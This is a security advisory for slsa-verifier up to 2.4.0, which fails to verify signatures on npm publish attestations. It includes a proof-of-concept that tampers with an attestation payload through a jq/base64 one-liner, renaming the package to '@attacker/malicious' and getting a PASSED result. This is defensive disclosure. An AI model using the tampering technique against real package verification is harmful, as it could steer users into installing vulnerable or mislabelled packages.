GHSA-r2xv-vpr2-42m9

Suggest an improvement
Source
https://github.com/advisories/GHSA-r2xv-vpr2-42m9
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-r2xv-vpr2-42m9/GHSA-r2xv-vpr2-42m9.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-r2xv-vpr2-42m9
Aliases
Related
Published
2023-11-08T19:15:55Z
Modified
2024-08-21T14:57:07.559017Z
Summary
slsa-verifier vulnerable to mproper validation of npm's publish attestations
Details

Summary

slsa-verifier<=2.4.0 does not correctly verify npm's publish attestations signature.

Proof of concept

Steps to reproduce: 1. curl -Sso attestations.json $(npm view @trishankatdatadog/supreme-goggles --json | jq -r '.dist.attestations.url') 2. curl -Sso supreme-goggles.tgz "$(npm view @trishankatdatadog/supreme-goggles --json | jq -r '.dist.tarball')" 3. In attestations.json, take the value addressed by the jq selector .attestations[0].bundle.dsseEnvelope.payload, base64decode it, tamper with it, base64encode that, and replace the original value with that. Save the file as attestations_tampered.json. Here is an example command to replace the package name with @attacker/malicious: jq -r ".attestations[0].bundle.dsseEnvelope.payload = \"$(jq -r '.attestations[0].bundle.dsseEnvelope.payload | @base64d' < attestations.json | jq '.subject[0].name = "pkg:npm/%40attacker/malicious"' | base64 -w0)\"" < attestations.json > attestations_tampered.json 5. SLSA_VERIFIER_EXPERIMENTAL=1 slsa-verifier verify-npm-package supreme-goggles.tgz --attestations-path attestations_tampered.json --builder-id "https://github.com/actions/runner/github-hosted" --package-name "@trishankatdatadog/supreme-goggles" --package-version 1.0.5 --source-uri github.com/trishankatdatadog/supreme-goggles 6. The result is that slsa-verifier fails to detect this tampering of the publish attestation (unlike with the provenance attestation) and returns PASSED.

Impact

An attacker who controls what packages and attestations are shown to a user can associate a package with an arbitrary name and version that do not match what the user expects from the publish attestation. Furthermore, the package digest in the publish attestation need not match its counterpart in the provenance attestation. However, the attacker cannot associate the given package with an arbitrary source and builder that the user does not expect from the provenance attestation. Thus, the attacker could, for example, convince package managers to install authentic but older versions of packages that contain known, exploitable vulnerabilities.

Severity is considered low because 1) it does not invalidate the provenance and 2) support for npm is currently experimental.

Patches

Fixed by PR #705 and released in versions >=2.4.1.

Workarounds

There is no easy way for users to fix or remediate this vulnerability without upgrading, short of verifying npm's publish attestations themselves, and cross-verifying it against GHA's provenance attestations.

References

Database specific
{
    "nvd_published_at": null,
    "cwe_ids": [],
    "severity": "LOW",
    "github_reviewed": true,
    "github_reviewed_at": "2023-11-08T19:15:55Z"
}
References

Affected packages

Go / github.com/slsa-framework/slsa-verifier/v2

Package

Name
github.com/slsa-framework/slsa-verifier/v2
View open source insights on deps.dev
Purl
pkg:golang/github.com/slsa-framework/slsa-verifier/v2

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
2.4.1-rc.0

Database specific

{
    "last_known_affected_version_range": "<= 2.4.0"
}

Go / github.com/slsa-framework/slsa-verifier

Package

Name
github.com/slsa-framework/slsa-verifier
View open source insights on deps.dev
Purl
pkg:golang/github.com/slsa-framework/slsa-verifier

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
1.4.1